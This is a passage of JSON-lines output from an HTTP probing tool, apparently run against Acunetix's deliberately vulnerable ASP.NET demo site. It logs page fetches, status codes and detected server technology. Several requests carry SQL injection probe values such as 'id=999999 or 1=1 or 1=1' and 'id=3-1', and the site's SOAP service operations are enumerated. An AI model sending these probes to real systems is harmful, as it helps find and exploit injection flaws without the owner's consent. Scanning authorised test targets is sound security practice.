Server\"],\"words\":663,\"lines\":108,\"status_code\":200,\"content_length\":14068,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.262598183Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/Comments.aspx?id=3-1\",\"input\":\"http://testaspnet.vulnweb.com/Comments.aspx?id=3-1\",\"title\":\"Comments\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Comments.aspx?id=3-1\",\"time\":\"519.209123ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":686,\"lines\":108,\"status_code\":200,\"content_length\":14401,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.293935566Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/Comments.aspx?id=999999%20or%201=1%20or%201=1\",\"input\":\"http://testaspnet.vulnweb.com/Comments.aspx?id=999999%20or%201=1%20or%201=1\",\"title\":\"Comments\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Comments.aspx?id=999999%20or%201=1%20or%201=1\",\"time\":\"526.391965ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":651,\"lines\":108,\"status_code\":200,\"content_length\":13884,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.574661138Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=0\",\"input\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=0\",\"title\":\"ReadNews\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/ReadNews.aspx?id=0\",\"time\":\"692.06729ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":1164,\"lines\":105,\"status_code\":200,\"content_length\":22841,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.643726551Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=1337\",\"input\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=1337\",\"title\":\"ReadNews\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/ReadNews.aspx?id=1337\",\"time\":\"531.771952ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":618,\"lines\":107,\"status_code\":200,\"content_length\":13447,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.679634573Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/acuservice/service.asmx?disco\",\"input\":\"http://testaspnet.vulnweb.com/acuservice/service.asmx?disco\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/acuservice/service.asmx?disco\",\"time\":\"343.60734ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Windows Server\"],\"words\":26,\"lines\":6,\"status_code\":200,\"content_length\":759,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.729707839Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=0\\u0026NewsAd=ads%2fdef.html\",\"input\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=0\\u0026NewsAd=ads%2fdef.html\",\"title\":\"ReadNews\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/ReadNews.aspx?id=0\\u0026NewsAd=ads%2fdef.html\",\"time\":\"692.459753ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":1165,\"lines\":105,\"status_code\":200,\"content_length\":22906,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.84728498Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/acuservice/service.asmx\",\"input\":\"http://testaspnet.vulnweb.com/acuservice/service.asmx\",\"title\":\"Service Web Service\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/acuservice/service.asmx\",\"time\":\"518.657167ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Windows Server\"],\"words\":1262,\"lines\":125,\"status_code\":200,\"content_length\":5814,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.847623003Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\",\"input\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\",\"title\":\"ReadNews\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\",\"time\":\"718.876083ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":1165,\"lines\":105,\"status_code\":200,\"content_length\":22906,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.872285069Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/acuservice/service.asmx?WSDL\",\"input\":\"http://testaspnet.vulnweb.com/acuservice/service.asmx?WSDL\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/acuservice/service.asmx?WSDL\",\"time\":\"517.830721ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1469,\"lines\":202,\"status_code\":200,\"content_length\":8524,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.874298503Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=2\",\"input\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=2\",\"title\":\"ReadNews\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/ReadNews.aspx?id=2\",\"time\":\"710.570461ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":3540,\"lines\":105,\"status_code\":200,\"content_length\":30547,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.878643535Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\",\"input\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\",\"title\":\"ReadNews\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\",\"time\":\"717.151888ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":3541,\"lines\":105,\"status_code\":200,\"content_length\":30608,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.911556721Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/about.aspx\",\"input\":\"http://testaspnet.vulnweb.com/about.aspx\",\"title\":\"About\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/about.aspx\",\"time\":\"528.117199ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":853,\"lines\":118,\"status_code\":200,\"content_length\":14621,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.915071059Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/Signup.aspx\",\"input\":\"http://testaspnet.vulnweb.com/Signup.aspx\",\"title\":\"Signup\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Signup.aspx\",\"time\":\"527.755862ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":600,\"lines\":109,\"status_code\":200,\"content_length\":13108,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.91042086Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=2\\u0026NewsAd=ads%2fdef.html\",\"input\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=2\\u0026NewsAd=ads%2fdef.html\",\"title\":\"ReadNews\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/ReadNews.aspx?id=2\\u0026NewsAd=ads%2fdef.html\",\"time\":\"711.829882ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":3541,\"lines\":105,\"status_code\":200,\"content_length\":30608,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.951027741Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=3\",\"input\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=3\",\"title\":\"ReadNews\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/ReadNews.aspx?id=3\",\"time\":\"728.103527ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":1183,\"lines\":105,\"status_code\":200,\"content_length\":17981,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.971053637Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=3\\u0026NewsAd=ads%2fdef.html\",\"input\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=3\\u0026NewsAd=ads%2fdef.html\",\"title\":\"ReadNews\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/ReadNews.aspx?id=3\\u0026NewsAd=ads%2fdef.html\",\"time\":\"716.713797ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":1184,\"lines\":105,\"status_code\":200,\"content_length\":18042,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:51.994194065Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\",\"input\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\",\"title\":\"ReadNews\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\",\"time\":\"684.175941ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":1184,\"lines\":105,\"status_code\":200,\"content_length\":18042,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:52.06690181Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=3-1\",\"input\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=3-1\",\"title\":\"ReadNews\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/ReadNews.aspx?id=3-1\",\"time\":\"701.525271ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":3540,\"lines\":105,\"status_code\":200,\"content_length\":30555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:52.095914868Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=999999%20or%201=1%20or%201=1\",\"input\":\"http://testaspnet.vulnweb.com/ReadNews.aspx?id=999999%20or%201=1%20or%201=1\",\"title\":\"ReadNews\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/ReadNews.aspx?id=999999%20or%201=1%20or%201=1\",\"time\":\"698.413998ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":1168,\"lines\":105,\"status_code\":200,\"content_length\":22911,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:53.03523477Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com:80/Comments.aspx\",\"input\":\"http://testaspnet.vulnweb.com:80/Comments.aspx\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Comments.aspx\",\"time\":\"353.304627ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:53.035586697Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com:80/ReadNews.aspx\",\"input\":\"http://testaspnet.vulnweb.com:80/ReadNews.aspx\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/ReadNews.aspx\",\"time\":\"354.483467ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:59.991329288Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/acuservice/service.asmx?op=GetUserInfo\",\"input\":\"http://testaspnet.vulnweb.com/acuservice/service.asmx?op=GetUserInfo\",\"title\":\"Service Web Service\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/acuservice/service.asmx?op=GetUserInfo\",\"time\":\"517.442767ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Windows Server\"],\"words\":989,\"lines\":162,\"status_code\":200,\"content_length\":7532,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:00.046542624Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/acuservice/service.asmx?op=HelloWorld\",\"input\":\"http://testaspnet.vulnweb.com/acuservice/service.asmx?op=HelloWorld\",\"title\":\"Service Web Service\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/acuservice/service.asmx?op=HelloWorld\",\"time\":\"511.298134ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Windows Server\"],\"words\":765,\"lines\":134,\"status_code\":200,\"content_length\":5754,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:00.056310758Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/acuservice/service.asmx?op=HelloUser\",\"input\":\"http://testaspnet.vulnweb.com/acuservice/service.asmx?op=HelloUser\",\"title\":\"Service Web Service\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/acuservice/service.asmx?op=HelloUser\",\"time\":\"519.510509ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":785,\"lines\":138,\"status_code\":200,\"content_length\":5930,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:01.01841945Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/ads/def.html\",\"input\":\"http://testaspnet.vulnweb.com/ads/def.html\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/ads/def.html\",\"time\":\"342.793748ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":29,\"lines\":16,\"status_code\":200,\"content_length\":488,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:01.021932687Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/ads/acunetix.gif\",\"input\":\"http://testaspnet.vulnweb.com/ads/acunetix.gif\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"image/gif\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/ads/acunetix.gif\",\"time\":\"351.316523ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":21,\"lines\":20,\"status_code\":200,\"content_length\":3048,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:01.177551271Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/acuservice/service.asmx?op=MD5Encode\",\"input\":\"http://testaspnet.vulnweb.com/acuservice/service.asmx?op=MD5Encode\",\"title\":\"Service Web Service\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/acuservice/service.asmx?op=MD5Encode\",\"time\":\"519.578848ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Windows Server\"],\"words\":785,\"lines\":138,\"status_code\":200,\"content_length\":5918,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:01.248710315Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/favicon.ico\",\"input\":\"http://testaspnet.vulnweb.com/favicon.ico\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"image/x-icon\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/favicon.ico\",\"time\":\"348.265554ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":2,\"lines\":4,\"status_code\":200,\"content_length\":894,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:01.437904091Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/default.aspx\",\"input\":\"http://testaspnet.vulnweb.com/default.aspx\",\"title\":\"acublog news\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/default.aspx\",\"time\":\"529.667352ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET:2.0.50727\",\"Microsoft Visual Studio\",\"Windows Server\"],\"words\":774,\"lines\":89,\"status_code\":200,\"content_length\":14066,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:01.480412438Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/images/background.gif\",\"input\":\"http://testaspnet.vulnweb.com/images/background.gif\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"image/gif\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/images/background.gif\",\"time\":\"357.010599ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":2,\"lines\":1,\"status_code\":200,\"content_length\":144,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:01.498009866Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/images/background.gif’\",\"input\":\"http://testaspnet.vulnweb.com/images/background.gif%E2%80%99\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/images/background.gif%E2%80%99\",\"time\":\"340.131068ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:01.595881528Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/images/comment-after.gif\",\"input\":\"http://testaspnet.vulnweb.com/images/comment-after.gif\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"image/gif\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/images/comment-after.gif\",\"time\":\"349.265493ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":11,\"lines\":17,\"status_code\":200,\"content_length\":1957,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:01.622027672Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/images/comment-before.gif\",\"input\":\"http://testaspnet.vulnweb.com/images/comment-before.gif\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"image/gif\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/images/comment-before.gif\",\"time\":\"352.934027ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":8,\"lines\":14,\"status_code\":200,\"content_length\":1919,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:01.651046077Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/images/logo_acunetix.gif\",\"input\":\"http://testaspnet.vulnweb.com/images/logo_acunetix.gif\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"image/gif\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/images/logo_acunetix.gif\",\"time\":\"352.064589ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":18,\"lines\":14,\"status_code\":200,\"content_length\":2506,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:01.934561757Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/images/logo_acunetix.gif’\",\"input\":\"http://testaspnet.vulnweb.com/images/logo_acunetix.gif%E2%80%99\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/images/logo_acunetix.gif%E2%80%99\",\"time\":\"348.083577ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:02.001433574Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/images/rss.gif\",\"input\":\"http://testaspnet.vulnweb.com/images/rss.gif\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"image/gif\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/images/rss.gif\",\"time\":\"352.716906ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":134,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:02.044744769Z\",\"port\":\"80\",\"url\":\"http://testaspnet.vulnweb.com/images/rss.gif’\",\"input\":\"http://testaspnet.vulnweb.com/images/rss.gif%E2%80%99\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/images/rss.gif%E2%80%99\",\"time\":\"357.109658ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows 